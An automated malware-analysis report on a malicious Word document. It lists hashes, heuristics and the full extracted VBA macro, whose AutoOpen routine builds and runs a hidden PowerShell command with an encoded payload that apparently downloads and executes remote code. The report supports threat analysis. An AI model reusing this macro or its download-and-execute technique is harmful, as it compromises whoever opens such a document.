Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4f6800be258d5c9b…

MALICIOUS

Office (OLE)

267.5 KB Created: 2018-02-22 14:58:00 Authoring application: Microsoft Office Word First seen: 2018-03-04
MD5: 7a3716ff4ce9914713d760da55bb6fd7 SHA-1: bb65f21241e9bf00cbae1fac0f0e0baa934ab056 SHA-256: 4f6800be258d5c9b2789ba10587cf1cb937c6a849f0585cacc51c97edd790aca
110 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro constructs a string that appears to be a Base64 encoded command, likely intended for execution via PowerShell. The macro uses string concatenation and an array of characters to build the command, which is then likely decoded and executed. The specific command is too obfuscated to fully reconstruct, but the presence of 'System.Text.Encoding' and 'ToBase64String' suggests a decoding operation.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        ET_QJ = ET_QJ + BR_TF
        Shell$ ET_QJ
    End Sub
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "remi"
    Sub AutoOpen()
        Dim ET_QJ As String
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5896 bytes
SHA-256: d3108f6d07df4ddc4dea470985aeb78fa7746fc7103c8045edc265ccf6793645
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "remi"
Sub AutoOpen()
    Dim ET_QJ As String
    IQ_KC = Array("p", "o", "l", "-", "r", " ", "s", "u", "x", "i", "d", "h", "y", "e", "w", "t", "n", "b", "a", "c")
    Dim AM_SJ As String
    AM_SJ = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
    ET_QJ = ET_QJ + IQ_KC(0)
    ET_QJ = ET_QJ + IQ_KC(1)
    Dim HO_TE As String
    HO_TE = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVAB"
    ET_QJ = ET_QJ + IQ_KC(14)
    ET_QJ = ET_QJ + IQ_KC(13)
    Dim BT_PI As String
    BT_PI = "lAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBV"
    ET_QJ = ET_QJ + IQ_KC(4)
    ET_QJ = ET_QJ + IQ_KC(6)
    Dim JL_PG As String
    JL_PG = "AFQARgA4AC4ARwBlAHQAUwB0"
    ET_QJ = ET_QJ + IQ_KC(11)
    ET_QJ = ET_QJ + IQ_KC(13)
    Dim HS_TE As String
    HS_TE = "AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
    BR_TF = BR_TF & AM_SJ & HO_TE & BT_PI & JL_PG & HS_TE
    ET_QJ = ET_QJ + IQ_KC(2)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim CL_NC As String
    CL_NC = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdA"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim EK_MJ As String
    EK_MJ = "ByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
    ET_QJ = ET_QJ + IQ_KC(14)
    ET_QJ = ET_QJ + IQ_KC(9)
    Dim IO_SB As String
    IO_SB = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8A"
    ET_QJ = ET_QJ + IQ_KC(16)
    ET_QJ = ET_QJ + IQ_KC(10)
    Dim AS_QF As String
    AS_QF = "awBlAC0AdwBlAGIAcg"
    ET_QJ = ET_QJ + IQ_KC(1)
    ET_QJ = ET_QJ + IQ_KC(14)
    Dim JK_RC As String
    JK_RC = "BlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABz"
    BR_TF = BR_TF & CL_NC & EK_MJ & IO_SB & AS_QF & JK_RC
    ET_QJ = ET_QJ + IQ_KC(6)
    ET_QJ = ET_QJ + IQ_KC(15)
    Dim CN_SB As String
    CN_SB = "ADoALwAvAHUAcwBwAHIAZAA1A"
    ET_QJ = ET_QJ + IQ_KC(12)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim ER_QG As String
    ER_QG = "DEANQAwAGMAZQBuAHQAcgBhAGwALg"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim EN_OF As String
    EN_OF = "B0AGEAYgBsAGUALgBjA"
    ET_QJ = ET_QJ + IQ_KC(11)
    ET_QJ = ET_QJ + IQ_KC(9)
    Dim IT_MB As String
    IT_MB = "G8AcgBlAC4AdwBpAG4AZ"
    ET_QJ = ET_QJ + IQ_KC(10)
    ET_QJ = ET_QJ + IQ_KC(10)
    Dim CQ_RI As String
    CQ_RI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8A"
    BR_TF = BR_TF & CN_SB & ER_QG & EN_OF & IT_MB & CQ_RI
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(16)
    Dim DR_NE As String
    DR_NE = "dQBzAGUAPwAkAGYAaQBsAHQA"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim AK_KF As String
    AK_KF = "ZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQ"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(8)
    Dim DT_RC As String
    DT_RC = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwA"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(19)
    Dim HP_TB As String
    HP_TB = "mACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB2"
    ET_QJ = ET_QJ + IQ_KC(7)
    ET_QJ = ET_QJ + IQ_KC(15)
    Dim GT_PE As String
    GT_PE = "AD0AMgAwADEANwAtADAANA"
    BR_TF = BR_TF & DR_NE & AK_KF & DT_RC & HP_TB & GT_PE
    ET_QJ = ET_QJ + IQ_KC(9)
    ET_QJ = ET_QJ + IQ_KC(1)
    Dim IN_QI As String
    IN_QI = "AtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBzAHIA"
    ET_QJ = ET_QJ + IQ_KC(16)
    ET_QJ = ET_QJ + IQ_KC(0)
    Dim AN_SD As String
    AN_SD = "dAA9AHM"
    ET_QJ = ET_QJ + IQ_KC(1)
    ET_QJ = ET_QJ + IQ_KC(2)
    Dim FR_QD As String
    FR_QD = "AYwBvACYAcwBwAD0AcgB"
    ET_QJ = ET_QJ + IQ_KC(9)
    ET_QJ = ET_QJ + IQ_KC(19)
    Dim FK_RD As String
    FK_RD = "3AGQAbABhAGMAdQBwACY"
    ET_QJ = ET_QJ + IQ_KC(12)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim JK_QC As String
    JK_QC = "AcwBlAD0AMgAwADEANwAtADEAMAAtADAAN"
    BR_TF = BR_TF & IN_QI & AN_SD & FR_QD & FK_RD & JK_QC
    ET_QJ = ET_QJ + IQ_KC(17)
    ET_QJ = ET_QJ + IQ_KC(12)
    Dim FM_OG As String
    FM_OG = "gBUADIAMgA6ADQAMQA6ADEAMgBaAC"
    ET_QJ = ET_QJ + IQ_KC(0)
    ET_QJ = ET_QJ + IQ_KC(18)
    Dim AQ_OF As String
    AQ_OF = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADIA"
    ET_QJ = ET_QJ + IQ_KC(6)
    ET_QJ = ET_QJ + IQ_KC(6)
    Dim IP_NG As String
    IP_NG = "OABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQBoAHQ"
    ET_QJ = ET_QJ + IQ_KC(5)
    ET_QJ = ET_QJ + IQ_KC(3)
    Dim HN_TC As String
    HN_TC = "AdABwAHMAJgBzAGkA"
    ET_QJ = ET_QJ + IQ_KC(13)
    ET_QJ = ET_QJ + IQ_KC(5)
    Dim AR_TD As String
    AR_TD = "ZwA9AHQAegBQADcAYwA4AHgAWgBoAHIAMQBzAGI"
    BR_TF = BR_TF & FM_OG & AQ_OF & IP_NG & HN_TC & AR_TD
    Dim HQ_MF As String
    HQ_MF = "AdgB4ADkAZgBKA"
    Dim GT_LB As String
    GT_LB = "FMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEIAbg"
    Dim FQ_QH As String
    FQ_QH = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0AC"
    Dim HN_TJ As String
    HN_TJ = "UAMwBEACcAIAAtAEgAZQBhAGQA"
    Dim FK_NA As String
    FK_NA = "ZQByAHMAIABAAHsAJwBBA"
    BR_TF = BR_TF & HQ_MF & GT_LB & FQ_QH & HN_TJ & FK_NA
    Dim JQ_RD As String
    JQ_RD = "GMAYwBlAHAAdA"
    Dim DS_QJ As String
    DS_QJ = "AnAD0AJwBBAHAAcABsA"
    Dim HR_QB As String
    HR_QB = "GkAYwBhA"
    Dim BK_NI As String
    BK_NI = "HQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABl"
    Dim AS_PD As String
    AS_PD = "AG4AdAAgAHwAIABDAG"
    BR_TF = BR_TF & JQ_RD & DS_QJ & HR_QB & BK_NI & AS_PD
    Dim HS_KH As String
    HS_KH = "8AbgB2AGUAcgB0AEYAcg"
    BR_TF = BR_TF & HS_KH
    Dim HQ_SF As String
    HQ_SF = "BvAG0ALQBKAHMAbwBuACkALgB2AGEA"
    BR_TF = BR_TF & HQ_SF
    Dim JN_NJ As String
    JN_NJ = "bAB1AGUALgBkAGEAdABhACkAKQA="
    BR_TF = BR_TF & JN_NJ
    ET_QJ = ET_QJ + BR_TF
    Shell$ ET_QJ
End Sub